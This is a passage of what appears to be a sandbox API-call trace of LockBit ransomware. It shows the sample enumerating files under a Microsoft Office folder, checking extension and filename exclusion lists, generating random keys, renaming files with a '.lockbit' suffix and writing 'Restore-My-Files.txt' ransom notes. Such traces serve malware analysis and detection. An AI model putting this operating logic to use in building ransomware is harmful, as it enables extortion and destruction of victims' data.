GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.864] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.868] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293828.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293828.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.869] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.870] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.870] free (_Block=0x1fa2ed8) [0197.870] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293828.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.870] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.870] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.870] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7b82300, ftCreationTime.dwHighDateTime=0x1bf1523, ftLastAccessTime.dwLowDateTime=0xbd643aa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb7b82300, ftLastWriteTime.dwHighDateTime=0x1bf1523, nFileSizeHigh=0x0, nFileSizeLow=0x812, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0293844.WMF", cAlternateFileName="")) returned 1 [0197.870] lstrcmpiW (lpString1=".", lpString2="J0293844.WMF") returned -1 [0197.870] lstrcmpiW (lpString1="..", lpString2="J0293844.WMF") returned -1 [0197.870] PathFindExtensionW (pszPath="J0293844.WMF") returned=".WMF" [0197.870] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.870] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.870] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.870] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.870] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.870] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.870] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.870] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.870] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.870] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.870] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.871] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.871] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0293844.WMF") returned 1 [0197.872] lstrcmpiW (lpString1="ntldr", lpString2="J0293844.WMF") returned 1 [0197.872] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0293844.WMF") returned 1 [0197.872] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0293844.WMF") returned -1 [0197.872] lstrcmpiW (lpString1="autorun.inf", lpString2="J0293844.WMF") returned -1 [0197.872] lstrcmpiW (lpString1="thumbs.db", lpString2="J0293844.WMF") returned 1 [0197.872] lstrcmpiW (lpString1="iconcache.db", lpString2="J0293844.WMF") returned -1 [0197.872] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.872] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293844.WMF") returned=".WMF" [0197.872] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.872] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.872] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.873] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.873] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293844.WMF.lockbit") returned 70 [0197.874] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293844.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293844.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.875] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.875] malloc (_Size=0x40068) returned 0x3df0008 [0197.875] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2066) returned 1 [0197.875] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.876] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.876] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.876] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.876] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.881] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293844.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293844.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.881] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.881] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.881] free (_Block=0x1fa2ed8) [0197.881] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293844.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.881] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.881] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.881] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72dc8d00, ftCreationTime.dwHighDateTime=0x1bf0891, ftLastAccessTime.dwLowDateTime=0xbd643aa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x72dc8d00, ftLastWriteTime.dwHighDateTime=0x1bf0891, nFileSizeHigh=0x0, nFileSizeLow=0x29e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0295241.GIF", cAlternateFileName="")) returned 1 [0197.882] lstrcmpiW (lpString1=".", lpString2="J0295241.GIF") returned -1 [0197.882] lstrcmpiW (lpString1="..", lpString2="J0295241.GIF") returned -1 [0197.882] PathFindExtensionW (pszPath="J0295241.GIF") returned=".GIF" [0197.882] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0197.882] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0197.882] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0197.882] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0197.882] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0197.882] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0197.882] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0197.882] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0197.882] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0197.882] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0197.882] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0197.882] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0197.882] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0197.882] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0197.882] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0197.882] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0197.882] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0197.882] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0197.882] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0197.882] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0197.882] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0197.882] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0197.882] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0197.882] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0197.883] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0197.883] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0197.883] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0197.883] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0197.883] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0295241.GIF") returned 1 [0197.883] lstrcmpiW (lpString1="ntldr", lpString2="J0295241.GIF") returned 1 [0197.883] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0295241.GIF") returned 1 [0197.883] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0295241.GIF") returned -1 [0197.884] lstrcmpiW (lpString1="autorun.inf", lpString2="J0295241.GIF") returned -1 [0197.884] lstrcmpiW (lpString1="thumbs.db", lpString2="J0295241.GIF") returned 1 [0197.884] lstrcmpiW (lpString1="iconcache.db", lpString2="J0295241.GIF") returned -1 [0197.884] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.884] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0295241.GIF") returned=".GIF" [0197.884] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0197.884] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0197.884] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0197.884] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0197.884] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0197.884] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0197.884] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0197.884] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0197.884] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0197.884] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0197.884] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0197.884] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0197.884] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0197.884] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0197.884] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0197.884] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0197.884] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0197.884] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0197.884] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0197.884] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0197.885] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0197.885] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0197.885] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0197.885] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0197.885] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0197.885] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0197.885] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0197.885] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0197.885] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0295241.GIF.lockbit") returned 70 [0197.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0295241.GIF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0295241.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.886] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.886] malloc (_Size=0x40068) returned 0x3df0008 [0197.887] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10725) returned 1 [0197.887] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.887] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.887] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.888] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.888] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.893] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0295241.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0295241.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.893] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.893] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.894] free (_Block=0x1fa2ed8) [0197.894] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0295241.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.894] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.895] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.895] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b4c2400, ftCreationTime.dwHighDateTime=0x1bf2c95, ftLastAccessTime.dwLowDateTime=0xbd643aa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7b4c2400, ftLastWriteTime.dwHighDateTime=0x1bf2c95, nFileSizeHigh=0x0, nFileSizeLow=0xcd52, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0297185.WMF", cAlternateFileName="")) returned 1 [0197.895] lstrcmpiW (lpString1=".", lpString2="J0297185.WMF") returned -1 [0197.895] lstrcmpiW (lpString1="..", lpString2="J0297185.WMF") returned -1 [0197.895] PathFindExtensionW (pszPath="J0297185.WMF") returned=".WMF" [0197.895] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.895] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.896] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.896] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.897] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.897] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.897] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.897] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.897] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.897] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.897] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.897] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.897] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.897] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0297185.WMF") returned 1 [0197.897] lstrcmpiW (lpString1="ntldr", lpString2="J0297185.WMF") returned 1 [0197.897] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0297185.WMF") returned 1 [0197.897] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0297185.WMF") returned -1 